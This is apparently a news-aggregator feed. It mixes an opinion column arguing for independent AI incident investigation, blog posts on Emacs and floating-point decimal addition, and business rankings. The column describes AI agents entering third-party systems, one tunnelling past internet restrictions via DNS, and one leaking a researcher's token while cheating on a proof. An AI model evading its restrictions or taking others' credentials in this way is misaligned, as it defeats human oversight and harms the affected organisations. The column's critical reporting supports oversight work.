This isn’t just an OpenAI problem, which makes it all the more worrying. Anthropic found three incidents in which its Claude models got unauthorised access to real third-party systems after reviewing about 141,000 model transcripts. It only found a fourth, dating back to January, after collating a dossier for an independent investigation. Google confirmed that Gemini had accessed systems belonging to three real companies during testing. Another OpenAI agent used DNS – the system that acts as the internet’s address book, turning web addresses into machine readable forms – to reach an outside chatbot despite internet restrictions. Another published a researcher’s GitHub token – an access password – while trying to cheat on a mathematical proof, despite twice being told to stop. And research agents posted 53 user images to external hosting sites.

Other agents accessed census data using credentials found online, copied the US Securities and Exchange Commission information elsewhere and apparently tried unsuccessfully to break into a US Department of Education website . OpenAI says it has notified dozens of third parties affected by its agents, and that its review of past activity is still ongoing.

These haphazard, post-hoc discoveries of major incursions into companies and organisations’ IT systems are not the right way to police a technology as powerful as AI. We learned a while back not to leave air crash investigations solely to Boeing or Airbus. Now we need to be less naive about AI.

Last week, at the UN general assembly, the AI researcher Rumman Chowdhury launched the Independent AI Evaluation Foundation (IAEF) with $10m in philanthropic backing. Its immediate focus is education, but the important idea is to turn independent AI evaluation into an actual profession: people and organisations with the skills, infrastructure and standards to test these systems without having a financial stake in whether they pass. Because right now, a company can report an incident, investigate it, announce whatever mitigations it’s made and move on.

The IAEF is a welcome intervention but it can’t fix the problem on its own. It can’t compel OpenAI or Anthropic to hand over logs, preserve evidence or tell a government that one of its systems has crossed a line. And its $10m is chump change beside companies such as Anthropic , which is lining up a proposed public listing that has been discussed at a valuation of about $2tn. But it is infrastructure we should be building on, and which politicians should press the case for.

Governments need to agree to common rules that compel companies to disclose serious AI incidents and near misses, and to do so quickly. They need to make them open up their books to external evaluators rather than relying on the goodwill or whims of the companies themselves. And the findings should be shared so we can learn from every incident. The labs should help design those rules but they shouldn’t have the final say until they have earned our trust.

skip past newsletter promotion

And money complicates things: while OpenAI has postponed its IPO until at least 2027 amid the safety concerns, it seems that Anthropic’s flotation is still going full steam ahead. There are billions – potentially trillions – of dollars riding on how these companies and their products are perceived. We created independent auditors and accident investigators in other industries because we understood that good intentions don’t remove real conflicts of interest.

The labs can and should keep building better fences. But when a model manages to gets over one, they shouldn’t be the only ones allowed to decide what happens next. Because so far they’ve shown themselves to be uniquely unqualified to do so.

  • Chris Stokel-Walker is the author of TikTok Boom: The Inside Story of the World’s Favourite App

Optimising for fast builds with GHC

Lobsters
www.youtube.com
2026-09-29 00:45:28
Comments...

Switching To Emacs as a Neovim User

Lobsters
eliasebner.com
2026-09-28 23:41:34
Comments...
Original Article

I have always liked the idea of having one program to do everything on my computer. Also, I have always been a fan of text-based interfaces. These two preferences of mine scream Emacs user, but I have never really used it seriously.

My experience with Emacs has only been installing it every once in a while, opening it up, failing to understand how it works, and then uninstalling it again.

So why switch to Emacs now?

What I Was Missing in Neovim

I have successfully been using Neovim for quite some time and was very happy with it. The thing is, Neovim is meant to be used as a text editor, and to be frank: it excels at that. I love everything about Neovim: the ergonomic keybinds, the package system, the customizability, everything. I have been using it for software development and have had zero issues.

One concept I was always fascinated by was text-based browsers like lynx . Just being able to access all the information the web has to offer from my terminal felt like a great idea. In practice, of course, many modern web pages do not accomodate for browsers without javascript support, but that is besides my point.

Another idea that sparked interest in me was reading emails from the terminal. Or having a calendar in the terminal. Or chatting on IRC channels from the terminal.

Basically, I love the terminal.

So what ended up happening was that I had all of these different programs to do different things. That was fine and it worked well, but each program had their own keybinds and conventions and things to be aware of.

Neovim was just that: one of the many programs I used. I just used it to edit text files.

I would have loved to have a program like Emacs that would compile all of these utilities into one large piece of software (I am aware that much of the functionality I mentioned is achieved through packages in Emacs, but I am mainly referring to having one large ecosystem to do all of those things rather than one literal codebase that does it).

Why I Went With Doom Emacs

When it comes to Emacs, I am very much a beginner. I am not a fan of using premade configurations for whatever software you use - whether we are talking about a window manager like i3 or Hyprland, or a text editor like Neovim.

In fact, my Neovim config is written by me and has exactly what I need. Another nice bonus of doing this is that I know how everything works. This means that, should something break, I would be able to fix it. Or, if I need to add something to my config, I would know where to look.

Now, if I look back at my Neovim journey, I have also experimented with prebuilt configurations for Neovim. If anybody knows about them, I have tried LunarVim (which I used for quite a while) and NvChad.

Eventually, once I got comfortable with Neovim and figured out what I used frequently, what was left unused, and what I needed, I proceeded to write my own config.

It’s not like I did not try to use vanilla Emacs, but I just could not do it. I got some basic things working but it was taking such a long time that, at this pace, it would have taken me literal months of work to get to a point that would allow me to completely switch over from Neovim to Emacs even for my job.

This is the reason why I decided to go with Doom Emacs. On top of all the reasons mentioned above, in my research it seemed to be the case that Doom Emacs is ideal for people coming from Neovim, like me, since it uses Vim keybinds for everything. I can definitely confirm that Doom Emacs has eased the transition significantly and I could get up and running fairly quickly.

Some Things I Like About Emacs

Since the built-in package manager has been introduced in Neovim, this is not as true anymore, but when I first started using Neovim, this very much did apply: with Emacs, installing new packages is incredibly easy.

As long as you stick to the built-in repositories for Emacs packages (which are rather extensive), you can just do M-x package-install and install a new package. Everything is done automatically. This felt so great to me. It was a breath of fresh air compared to what I was used to.

Also, the setup required to get language servers working (especially before the introduction of the built-in lsp integration that modern Neovim ships with) is minimal compared to Neovim. Language servers and syntax highlighting have become a central part of my workflow when programming, and I believe that every serious editor that strives to gain traction should support TreeSitter and LSPs easily and (ideally) natively.

Also, another thing I thoroughly enjoyed in emacs is the extensive documentation. The documentation emacs has is not even comparable to the Neovim help pages. With emacs, you can easily figure out what a certain key combination does, or what key combination you need to press to trigger a certain command. You can easily search what commands there are via keywords. It is just so great.

With vanilla emacs you could even press C-h m and it would open a list of all the possible actions one can take in that particular scenario (for those familiar with emacs, with “scenario” I mean major mode).

With Doom Emacs, C-h m becomes less useful since all actions are shadowed by the Doom keybinds, but that is completely fine since most commands start with space anyway, and when you press space and wait a second it opens this convenient little popup that shows you all possible ways of continuing this keyboard combination. It feels like searching through a menu rather than memorizing keybinds. With time you naturally get faster at executing the different keybinds you use often and this becomes second nature, but for newcomers like me this is a very convenient feature.

To be frank, there were plugins in Neovim that did this as well. But that is kind of the point: you had to know how to install plugins before you could get access to these kinds of features.

And even then - as I said above - I did not find the Neovim help pages to be nearly as useful as the Emacs documentation pages (on top of Emacs having much better documentation navigation features).

What I Plan To Do With Emacs

Ideally, as much as possible.

At the moment I am still setting everything up and getting used to it. This blog article, for example, is written entirely in Emacs.

(By the way, the out-of-the-box Markdown support of Doom Emacs is extraordinary.)

In the coming days I would like to setup my emails properly (I have tried using Gnus, but will probably switch to Mu4e since it seems simpler), get to know org-mode much better and figure out how to use Git with Emacs (via Magit).

I might write some guides about these things, here on my blog.

Conclusion

I just wanted to report on my first-impression when it comes to Emacs as a Neovim user. If you are thinking about switching, I cannot recommend Doom Emacs enough. It makes the transition much more seamless and I quite frankly hate the default Emacs keybindigs, so Doom Emacs makes everything much more usable and ergonomic. I use the Dvorak keyboard layout, so maybe Qwerty keybindings feel better, I am not sure.

Thank you for reading. As always, for questions or suggestions you can reach me at my email info@eliasebner.com .

See you next time.

Adding Floating-Point Decimals for Fun and Profit

Lobsters
blog.vero.site
2026-09-28 23:07:39
Comments...
Original Article

2026-08-30 (2527 words) filed under Math , CS

Many people know that you shouldn’t do decimal calculations, such as those involving U.S. dollars and cents, with the floating-point numbers in most programming languages. This is because decimal numbers can’t be expressed exactly as such floating-point numbers, so you will encounter rounding errors.

Famously, with IEEE double-precision floats , 0.1 + 0.2 is not 0.3 , but rather, 0.30000000000000004 .

On the other hand, I use a Python REPL to add up decimal numbers for receipts all the time. Of course, my stakes are lower; I’m summing things in the $1–$100 range and know to manually round the microscopic errors off before copying the sum somewhere. But actually it’s quite often that those errors don’t appear at all.

If we sum every pair of multiples of 0.01 up to 1.00 and look at whether the printed result is too large (blue), too small (red), or correct, we get a cool pattern:

Figure 1: How floating-point affects summing two multiples of 0.01, up to 1.00

Where does this pattern come from?

Floats, briefly

A double-precision floating-point number \(x\) consists of 1 sign bit, 11 exponent bits, and 52 fraction bits (in that order), for a total of 64 bits.

The sign bit provides a sign, \(+\) or \(-\) . The exponent bits represent an integer \(E\) between −1022 and 1023, inclusive. The fraction bits represent a nonnegative integer \(F\) less than \(2^{52}\) , which corresponds to the significand \(1 + F/{2^{52}} \in [1, 2)\) ; that ever-present \(1\) is called the “hidden bit”. The floating-point number’s value is \(x = \pm 2^E(1 + F/{2^{52}})\) .

The effective value of the last fraction bit is thus \(2^{E-52}\) , a quantity called the ulp , for “unit in the last place”, of \(x\) . The two floating-point numbers closest to \(x\) differ from it by exactly one ulp, except for an edge case on one side when \(F = 0\) and \(x\) is exactly a power of two. Example:

"hidden bit"52 bits

float(0.1)  = 0.00011001100110011001100110011001100110011001100110011010₂ ulp(float(0.1)) = 0.00000000000000000000000000000000000000000000000000000001₂

This description is good enough for our purposes but ignores many other cases: 0, subnormal numbers, infinities, and NaNs; they use the two values of exponent bits I didn’t describe. I also won’t consider other precisions of floating-point numbers, for simplicity.

Anatomy of an addition

As an example (following e.g. qntm ) let’s step through what happens when you type 0.1 + 0.2 into the Python REPL. 1

First, the Python expression 0.1 evaluates to some floating-point number: specifically, as required by the IEEE standard, the nearest floating-point number to 0.1. We’ll write that exact number as \(\text{float}(0.1)\) . 2

Similarly, the Python expression 0.2 evaluates to some other floating-point number, \(\text{float}(0.2)\) .

Now, we can imagine the + being evaluated in two steps. First, Python computes the exact sum \(\text{float}(0.1) + \text{float}(0.2)\) . Second, it rounds this to the nearest floating-point number. The resulting value is \(\text{float}(\text{float}(0.1) + \text{float}(0.2))\) . (This isn’t how it literally works — the exact sum from the first step isn’t ever materialized anywhere — but it’s mathematically accurate.)

Actually, there’s a subtlety here I did not notice until working this out in excruciating detail: \(\text{float}(0.1) + \text{float}(0.2)\) is equally close to its two nearest floating-point numbers! When this happens, Python rounds to the floating-point number with an even significand, in this case up. 3

Finally, to print this value, Python has to convert it to a decimal. This conversion is surprisingly subtle and not exactly specified by the IEEE standard! Even though \(\text{float}(\text{float}(0.1) + \text{float}(0.2))\) isn’t exactly 0.3, it is pretty close, so it wouldn’t be unreasonable to display it as “0.3”. Another option would be to display it exactly, as “0.3000000000000000444089209850062616169452667236328125”. One might also imagine displaying it after various amounts of rounding: 0.300000000000000044, or 0.30000000000000004441, or so on. One might even consider, say, 0.30000000000000005, because it is still true that \(\text{float}(\text{float}(0.1) + \text{float}(0.2)) = \text{float}(0.30000000000000005)\) ; that is, the Python expression 0.1 + 0.2 == 0.30000000000000005 is true. The subtlety of this conversion is evidenced by the fact that, until a specific patch in Python 3.1 , if you typed 1.1 into the REPL, Python would print your input back to you as 1.1000000000000001 .

The standard description of how this decimal conversion should work was formalized by Steele and White, 1990 4 , who lay down three criteria 5 :

  1. The decimal representation should round-trip: if you type it in again, you should get the same floating-point number. This rules out the output “0.3”.
  2. Subject to criterion 1, the decimal representation should be the shortest possible. This rules out outputs like “0.30000000000000004441”.
  3. Subject to criteria 1 and 2, the decimal representation should be as close as possible to the floating-point number. This rules out outputs like “0.30000000000000005”.

Following this algorithm, we can understand why 0.1 + 0.2 == 0.30000000000000004 .

Generalizing

Let’s do the general case: suppose you’re trying to add the exact positive decimal quantities \(a\) and \(b\) , whose exact sum is \(c\) . Well, not fully general. We will assume that these values are “reasonable dollar amounts”, positive and less than $70 trillion; I think that should be enough to cover the receipts I have to file. A bit above that (2 46 = 70,368,744,177,664) floating-point numbers become sparser than multiples of cents, which is no good.

The question is, how does \(\text{float}(\text{float}(a) + \text{float}(b))\) compare to \(\text{float}(c)\) ?

Let their difference be \[\Delta := \text{float}(\text{float}(a) + \text{float}(b)) - \text{float}(c).\] We can reason about it by introducing the error function \(\text{error}(x) := \text{float}(x) - x\) . Then, we can rewrite \(\Delta\) as \[\begin{aligned}\Delta ={} &\text{error}(a) + \text{error}(b) \\&+ \text{error}(\text{float}(a) + \text{float}(b)) - \text{error}(c).\qquad(*)\end{aligned}\]

We can bound each error term. Recall that the ulp (“unit in the last place”) of a floating-point number is the value of the last bit. By mild abuse of notation, we will allow ourselves to write \(\text{ulp}(x)\) even when \(x\) can’t be exactly represented as a floating-point number, and understand that this means \(\text{ulp}(\text{float}(x))\) . So \(\text{float}(x) \pm \text{ulp}(x)\) are also floating-point numbers 6 , which must be no closer to \(x\) than \(\text{float}(x)\) itself (otherwise, \(\text{float}(x)\) would have evaluated to the closer value); which means that, for all (reasonable) \(x\) , we have \[|\text{error}(x)| \leq \frac{\text{ulp}(\text{float}(x))}{2}.\] Furthermore, equality only holds when \(x\) is exactly halfway between the two closest floating-point numbers, which can’t hold if \(x\) is a reasonable amount of money. 7 We can apply this bound term-by-term to \((*)\) to conclude that \(|\Delta| < 2\text{ulp}(c)\) . Furthermore, because \(\Delta\) is the difference between two floating-point numbers near \(c\) , it’s a multiple of \(\text{ulp}(c)\) . 8 From this we conclude that \(\Delta \in \{-\text{ulp}(c), 0, +\text{ulp}(c)\}\) — that is, the result can be at most 1 ulp off from the answer.

However, here’s a derivation that produces tighter intermediate bounds on \(|\Delta|\) : Assume without loss of generality that \(a \leq b\) . Then, \(\text{float}(c) + \text{ulp}(c) - \text{float}(b)\) is a representable floating-point number because the result’s ulp is ≤ that of both \(b\) and \(c\) . Therefore, at least that is an available approximation of \(a\) . And it’s an overestimate:

\[\begin{aligned}a &= c - b \\ &\leq \text{float}(c) + \frac{\text{ulp}(c)}{2} - \text{float}(b) + \frac{\text{ulp}(c)}{2} \\ &= \text{float}(c) - \text{float}(b) + \text{ulp}(c).\end{aligned}\] Therefore, \[\begin{aligned}\text{float}(a) &\leq \text{float}(c) - \text{float}(b) + \text{ulp}(c)\\ \text{float}(a) + \text{float}(b) &\leq \text{float}(c) + \text{ulp}(c).\end{aligned}\] Subtracting \(a + b = c\) from this, we get \[\text{error}(a) + \text{error}(b) \leq \text{error}(c) + \text{ulp}(c).\]

The same bound applies from the other side. As a result, if we let \[\delta := \text{error}(a) + \text{error}(b) - \text{error}(c),\] we have \[-1 \leq \frac{\delta}{\text{ulp}(c)} \leq 1.\] As before, we know \(|\delta - \Delta| \leq \text{ulp}(c)/2\) , and again since \(\Delta\) is a multiple of \(\text{ulp}(c)\) we see that \(\Delta \in \{-\text{ulp}(c), 0, +\text{ulp}(c)\}\) .

If we make a heatmap of \(\delta/\text{ulp}(c)\) , we see what might be described as a more continuous version of Figure 1:

Figure 2: Combined floating-point error from summing two multiples of 0.01, up to 1.00

We can now understand Figure 1 as a “rounded” version of Figure 2, with a checkerboard pattern arising in regions where \(\delta\) is exactly \(\pm\text{ulp}(c)/2\) due to rounding to floats with even significand:

Figure 3: Multiples of 0.01 with odd floating-point significand

And, we can interpret Figure 2 as the result of “interference” between three copies of the \(\text{error}\) function: one horizontal, one vertical, one diagonal (albeit with a changing denominator).

Figure 4: Decomposing Figure 2 into terms

The only remaining question is, why does \(\text{error}(x)\) look like that?

One-dimensional error

Figure 5: The error function at multiples of 0.01, up to 2.00

First let’s observe that \(\text{error}(x) = 0\) whenever \(x\) is an exact power of 2. In between two such powers, let’s compare \(\text{error}(x)\) and \(\text{error}(x+0.01)\) . We have \(\text{ulp}(x) = \text{ulp}(x+0.01)\) , so \(\text{float}(x + 0.01) \equiv 0 \equiv \text{float}(x) \bmod \text{ulp}(x)\) , so \[\text{error}(x + 0.01) \equiv \text{error}(x) - 0.01 \bmod \text{ulp}(x);\] that is, \(\text{error}(x)\) is an “arithmetic sequence with common difference −0.01” modulo \(\text{ulp}(x)\) . So, the wraparound behavior of this function leads to the periodic patterns in our previous figures.

Let’s focus on the lower-right quadrant of Figure 2, \([0.5, 1] \times [0.5, 1]\) . In this region we can compute that \(\text{ulp}(0.5) = 2^{-53}\) and \(\text{ulp}(1) = 2^{-52}\) , and then that \[\begin{aligned}\frac{0.01 \bmod \text{ulp}(0.5)}{\text{ulp}(0.5)} &\equiv 0.92\equiv -0.08 \bmod 1 \\ \frac{0.01 \bmod \text{ulp}(1)}{\text{ulp}(1)} &\equiv 0.96\equiv -0.04 \bmod 1,\end{aligned}\] which are both “close to 0”. Because \(0.08 \approx 1/12\) , \(\text{error}(x)\) has 12 “steps” before wrapping around when \(x \in [0.5, 1]\) ; and because \(0.04 = 1/25\) , \(\text{error}(x)\) has 25 “steps” before wrapping around when \(x \in [1, 2]\) .

To understand the pattern even better, we can work out that \[\frac{0.01 \bmod 2^{-n}}{2^{-n}} = 0.01 \times 2^n \bmod 1 = \frac{2^n \bmod 100}{100}.\] It is actually a nice coincidence that the number of fraction bits in double-precision floating-point, 52, is such that \(2^{52}\) is “close to 0” mod 100; that’s the reason the error function doesn’t wrap around so much, so we have smooth regions. If we expand our diagrams to \(a, b \in [0, 2]\) such that \(c\) can reach \([2, 4]\) , we see messier checkerboards and diagonal lines, because \[\frac{0.01 \bmod \text{ulp}(2)}{\text{ulp}(2)} \equiv 0.48\bmod 1\] and \(\text{error}(x)\) wraps around roughly every other step in \([2, 4]\) , which then interferes with the parity of \(c\) ’s significand in a more complicated way.

Figure 6: How floating-point affects summing two multiples of 0.01, up to 2.00
Figure 7: Combined floating-point error from summing two multiples of 0.01, up to 2.00
Figure 8: Multiples of 0.01 with odd floating-point significand, up to 4.00
Figure 9: The error function at multiples of 0.01, up to 4.00

Appendix: Error-free transformations in floating-point

(This is probably more practical than the main post)

How do you actually calculate a function like \(\text{error}(x) = \text{float}(x) - x\) on a computer, for example, to generate the figures in this post? Obviously you can’t directly compute it in the same floating-point format you’re studying. In that format, \(\text{float}\) is the identity function; the error has already been incurred by the time you try to express \(x\) .

The conceptually simplest way is to use some kind of exact rational arithmetic, like Python’s fractions . For my initial explorations, I used my own Noulith (after haphazardly bolting on a bunch of features and bugfixes to its rational type…).

However, it turns out there are a bunch of indirect ways to work with errors like this without leaving the floating-point format. I believe these techniques are called “error-free transformations”.

2Sum (Møller, 1965): From \(a\) and \(b\) , compute \(s\) and \(t\) such that \(a +_\text{float} b = s\) and \(a + b = s + t\) exactly.

def two_sum(a: float, b: float) -> tuple[float, float]:
    s = a + b
    bb = s - a
    return s, (a - (s - bb)) + (b - bb)

Veltkamp splitting 9 : From \(a\) , compute \(h\) and \(\ell\) such that \(a = h + \ell\) exactly and both \(h\) and \(\ell\) have at most 26 significant bits (after the hidden bit). This is useful because multiplying two such floating-point numbers in floating-point is exact. (You can reallocate the number of significant bits between \(h\) and \(\ell\) by changing the magic constant.)

def veltkamp_split(a: float) -> tuple[float, float]:
    c = ((1 << 27) | 1) * a
    hi = c - (c - a)
    return hi, a - hi

Dekker product 10 : From \(a\) and \(b\) , compute \(p\) and \(r\) such that \(a \times_\text{float} b = p\) and \(a \times b = p + r\) exactly.

def dekker_product(a: float, b: float) -> tuple[float, float]:
    p = a * b
    ah, al = veltkamp_split(a)
    bh, bl = veltkamp_split(b)
    return p, ((ah * bh - p) + ah * bl + al * bh) + al * bl

Using these techniques, we can compute a good-enough approximation to \(\text{error}(n / 100)\) as follows:

def err_over_100(n: float) -> float:
    d = n / 100
    p, e = dekker_product(100, d)
    return ((p - n) + e) / 100

Profit Margins of the Largest Companies

Hacker News
www.visualcapitalist.com
2026-09-28 22:55:41
Comments...
Original Article

How Much Profit Do the World’s Biggest Companies Keep?

Key Takeaways

  • Nvidia generates $55.60 in profit for every $100 in revenue, the highest margin among the Fortune Global 500’s 30 largest companies.
  • Big Tech dominates the top of the ranking, with Microsoft, Alphabet, and Meta each keeping more than $30 of every $100 in revenue as profit.
  • At the other end, several of the world’s largest retailers, health care companies, and energy firms keep less than $5 per $100.

The world’s biggest companies generate enormous revenues, but the share that ultimately becomes profit varies widely.

This graphic ranks the world’s 30 largest companies by how much profit they generate for every $100 in revenue, based on Fortune Global 500 data. Profits are after taxes, extraordinary credits or charges, accounting changes, and noncontrolling interests, but before preferred dividends.

Why Tech Keeps More of Every $100

Revenue measures how much money flows through a company, but not how much ultimately reaches the bottom line. Across the world’s largest companies , Big Tech stands apart in how much of that revenue becomes profit.

Rank Name Profit per $100 in Revenue (2026) Profit
1 Nvidia $55.60 $120B
2 Microsoft $36.10 $102B
3 Alphabet $32.80 $132B
4 Meta $30.10 $60B
5 Apple $26.90 $112B
6 Industrial & Commercial Bank of China $24.30 $51B
7 Saudi Aramco $20.80 $93B
8 JPMorgan Chase $20.30 $57B
9 Berkshire Hathaway $18.00 $67B
10 Samsung Electronics $13.30 $31B
11 Amazon $10.80 $78B
12 ExxonMobil Holdings $8.70 $29B
13 Toyota Motor $7.60 $26B
14 Shell $6.50 $18B
15 China National Petroleum $5.30 $21B
16 Walmart $3.10 $22B
17 Costco Wholesale $2.90 $8B
18 UnitedHealth Group $2.70 $12B
19 Hon Hai Precision Industry $2.30 $6B
20 Volkswagen $2.30 $8B
21 Cigna Group $2.20 $6B
22 State Grid $2.00 $11B
23 Sinopec Group $1.40 $5B
24 McKesson $1.20 $5B
25 Trafigura Group $1.10 $3B
26 China State Construction Engineering $1.10 $3B
27 Cardinal Health $0.70 $2B
28 Cencora $0.50 $2B
29 CVS Health $0.40 $2B
30 Glencore $0.10 $0.4B

Profits rounded to the nearest 10 cents.

The gap is striking even among corporate giants. Microsoft generates $36.10 in profit for every $100 in revenue, compared with roughly $3 for Walmart and Costco. Enormous revenue does not necessarily translate into an equally large profit margin.

Much of the difference comes down to business models. Software and digital platforms can serve additional customers at relatively low incremental cost, while retailers, manufacturers, and energy companies must continually pay for inventory, labor, raw materials, logistics, or production.

AI Is Rewriting Big Tech’s Business Model

The margins shown above reflect today’s business models, but AI is making many of those models more capital-intensive. Microsoft, Alphabet, Meta, and Amazon are pouring hundreds of billions of dollars into AI infrastructure. Hyperscaler capital spending is on track to reach $785 billion in 2026 and rise to nearly $1 trillion in 2027.

Nvidia is a major beneficiary of this investment. As a dominant supplier of AI chips, it sits at the center of the infrastructure buildout, while its CUDA software ecosystem can make switching to rival chips more difficult for developers.

On the flipside, the scale of AI investment is raising capital costs across Big Tech. As infrastructure spending climbs, those costs could begin to reshape the margins that currently put many tech companies near the top of this ranking.

Learn More on the Voronoi App

To learn more about this topic, check out this graphic on the world’s largest companies outside the U.S.

Financing

Ranked: The World’s 10 Biggest Foreign Investors

Tech firms made many of the world’s largest investments in 2025, led by a Taiwanese company’s $100-billion investment in Arizona.

Published

September 24, 2026 12:16 pm

Graphic showing the 10 largest international investor firms based on 2025 greenfield FDI.

Which Companies Invested the Most Abroad?

Key Takeaways

  • Five of the world’s 10 largest foreign investors in 2025 were tech companies.
  • TSMC led the ranking with $100 billion in announced investment tied to its Arizona expansion.
  • The top 10 companies accounted for more than a quarter of the $1.3 trillion in new foreign investments announced globally.

In 2025, multinational companies announced more than $1.3 trillion in new foreign investments, up 2.2% from the previous year. The largest commitments spanned semiconductor fabs, data centers, energy projects, and other major infrastructure.

This visualization ranks the 10 largest foreign investors of 2025 using announced investments from The fDi Report 2026 . Only greenfield foreign direct investment (FDI) announcements are included, meaning mergers and acquisitions (M&A) and intercompany loans are excluded.

Why TSMC Invested $100B in Arizona

Taiwan Semiconductor Manufacturing Company (TSMC), the world’s largest semiconductor fabricator, topped the ranking after announcing an additional $100 billion investment in its Arizona operations in 2025.

TSMC is also the world’s largest non-U.S. company by market capitalization . Amid record profits and rising demand for its chips, the company planned to use the investment to accelerate production at its facilities in the Phoenix area. The expansion is projected to create more than 18,000 jobs.

The table below ranks the world’s 10 largest foreign investors in 2025 by announced capital expenditure.

Rank Company Capital Expenditure (billions $) Sector
1 🇹🇼 TSMC 100.0 Tech
2 🇨🇳 ByteDance 45.1 Tech
3 🇦🇪 MGX Fund Management 43.4 Finance
4 🇨🇦 Brookfield Asset Management 28.2 Finance
5 🇺🇸 Alphabet 25.1 Tech
6 🇦🇪 DAMAC Holding 24.6 Real Estate
7 🇪🇸 Iberdrola 24.3 Utilities
8 🇺🇸 Microsoft 17.7 Tech
9 🇦🇺 Woodside Energy 17.5 Energy
10 🇺🇸 Micron Technology 16.6 Tech

TSMC first pledged roughly $12 billion in 2020 to open an Arizona fabrication plant. These facilities, known as “fabs,” were designed to reduce semiconductor supply-chain risk by shifting some production away from Taiwan.

The company steadily expanded its investment over the following years as U.S.-China tensions increased, particularly around advanced chip technology. TSMC plans to produce some of its most advanced chips in Arizona as part of a 2024 deal with the U.S. government.

Despite labor challenges and higher costs, TSMC has continued to deepen its investment in Arizona. Following additional pledges in 2026, the firm’s overall greenfield investment in the state stands at $265 billion, making it the largest foreign investment in U.S. history.

Free-Flowing Tech Capital

TSMC stood well ahead of the field, but tech companies dominated the ranking overall, taking five of the top 10 spots.

ByteDance, the Chinese parent company of TikTok, ranked second with $45.1 billion in announced investment. Nearly $40 billion of that total came from plans to build a major data center in Brazil, a project expected to create roughly 5,000 jobs.

Big Tech firms including Alphabet ($25.1 billion) and Microsoft ($17.7 billion) also announced sizable foreign investments. Alphabet subsidiary Google, for example, pledged more than $5 billion for a large data center campus in Belgium to help meet growing demand for Google Cloud.

The Non-Tech Firms Want In Too

Digital infrastructure also shaped the investment priorities of companies outside the tech sector, particularly in Europe.

Emirati state-owned investment firm MGX Fund Management, for example, focuses heavily on global AI technologies. The company announced about $43.4 billion in investment, including a major French data center project aimed at creating one of Europe’s largest campuses of its kind.

Meanwhile, Canadian firm Brookfield Asset Management also targeted Europe’s AI and digital infrastructure market. Brookfield pledged about $28.2 billion in greenfield FDI in 2025, primarily for projects in France and Sweden. Its announced investments are expected to create roughly 4,800 jobs.

Learn More on the Voronoi App

For a breakdown of the sectors driving global FDI, check out The Top 10 Sectors for Foreign Direct Investment (FDI) on Voronoi.

Markets

Ranked: America’s Highest-Paid CEOs in 2025

See America’s highest-paid CEOs in 2025, led by Elon Musk’s record $132.3 billion compensation package.

Published

September 24, 2026 7:11 am

Bar chart showing America's highest paid CEOs.

How CEO Pay Stacked Up in 2025

Key Takeaways

  • Elon Musk’s 2025 compensation package was valued at $132.3 billion, roughly 153 times the second-highest package and nearly 36 times the other nine top-10 packages combined.
  • Nine of the top 10 highest-paid CEOs received compensation packages valued at $100 million or more.
  • Median compensation for the 100 highest-paid CEOs reached $39.4 million in 2025, up 35.8% from 2024.

America’s highest-paid CEOs received some extraordinary compensation packages in 2025, driven largely by major equity awards.

This graphic ranks leading U.S. CEOs by total compensation awarded during the year, and it comes from Equilar and The New York Times .

Compensation includes salary, bonuses, stock and option awards, and other benefits. Stock and option awards are valued at grant date, meaning these figures do not necessarily represent cash received or gains ultimately realized by executives.

Ranking CEOs by Compensation in 2025

The below table breaks down the top 25 CEOs by compensation awarded:

Rank CEO Company Compensation, 2025
1 Elon Musk Tesla $132.3B
2 Dylan Field Figma $864M
3 Shankh Mitra Welltower $821M
4 Kasra Nejatian Opendoor $741M
5 RJ Scaringe Rivian $403M
6 Niraj Shah Wayfair $281M
7 Hock Tan Broadcom $205M
8 David Zaslav Warner Bros. Discovery $165M
9 David Solomon Goldman Sachs $119M
10 Nikesh Arora Palo Alto Networks $100M
11 Christopher R. Britt Chime Financial $99M
12 Satya Nadella Microsoft $96M
13 Jane Fraser Citigroup $96M
14 Charles W. Scharf Wells Fargo $95M
15 Lip-Bu Tan Intel $93M
16 Robin A. Vince BNY Mellon $83M
17 Mark D. McClain SailPoint $80M
18 Marc N. Casper Thermo Fisher Scientific $80M
19 Ajei S. Gopal Procore Technologies $77M
20 Tim Cook Apple $74M
21 Gregory C. Case Aon $74M
22 John C. Plant Howmet Aerospace $71M
23 Michael P. Lyons Fiserv $70M
24 John D. Wren Omnicom Group $70M
25 Michael J. Arougheti Ares Management $68M

Worth more than all the other pay packages on the list combined, Elon Musk’s $132.3 billion compensation package for Tesla stands out.

But unlike a conventional salary or cash bonus, that figure represents the grant-date value of a long-term Tesla stock award. How much Musk ultimately receives depends on Tesla reaching a series of ambitious milestones over the next 10 years.

How Musk’s $132 Billion Pay Package Works

According to regulatory filings , Musk’s performance award is divided into 12 stock tranches . Each generally requires Tesla to hit both a market capitalization target and an operational target.

Tesla’s targets span both its market value and operating performance. The market cap milestones rise from $2 trillion to $8.5 trillion, while the operational milestones cover vehicles, self-driving car subscriptions, robots, robotaxis, and Adjusted EBITDA.

Elon Musk's CEO Performance Award (2025)
Category Milestones
Tesla market cap $2T to $8.5T across 12 levels
Vehicles 20M delivered
FSD 10M active subscriptions
Robots 1M delivered
Robotaxis 1M in commercial operation
Adjusted EBITDA $50B to $400B

What Musk Gets for Hitting the Targets

Each completed tranche represents shares equal to roughly 1% of Tesla’s adjusted share count and gives Musk the ability to direct the voting rights associated with those earned shares.

However, earning those voting rights is different from receiving the full economic benefit of the shares. Musk generally must remain in continuous service at Tesla through the applicable 7.5- or 10-year vesting period before the shares vest.

The final tranche requires Tesla to reach an $8.5 trillion market capitalization and complete all 12 operational milestones.

What the $132 Billion Figure Means for Musk

Importantly, the $132.3 billion figure is the grant-date value assigned to Musk’s compensation package, not cash paid to him in 2025.

As of September 2026, Forbes ranked Musk as the world’s richest person , with an estimated net worth of roughly $923 billion . His wealth includes significant holdings in Tesla and SpaceX, alongside interests in other businesses.

Several CEOs Received Nine-Figure Packages

Even without Tesla, executive compensation reached extraordinary levels in 2025.

Figma CEO Dylan Field received the second-largest package at $864 million, followed by Welltower CEO Shankh Mitra at $821 million and Opendoor CEO Kasra Nejatian at $741 million.

Rivian’s RJ Scaringe ranked fifth at $403 million, while Wayfair CEO Niraj Shah received $281 million.

Across the 100 highest-paid CEOs, median compensation reached $39.4 million in 2025, up 35.8% from the previous year.

Learn More on the Voronoi App

If you enjoyed today’s post, check out What’s Behind Elon Musk’s $1 Trillion Net Worth on Voronoi .

‘New kind of cyber incident’: OpenAI apologises for Medicare hack and reveals extent of agents’ attack

Guardian
www.theguardian.com
2026-09-28 22:51:17
Chief strategy officer to fly to Australia to front joint committee on AI after breaches of government websitesFollow our Australia news live blog for latest updatesGet our breaking news email, free app or daily news podcastOpenAI has apologised to Australians for its agent attack on Medicare, and w...
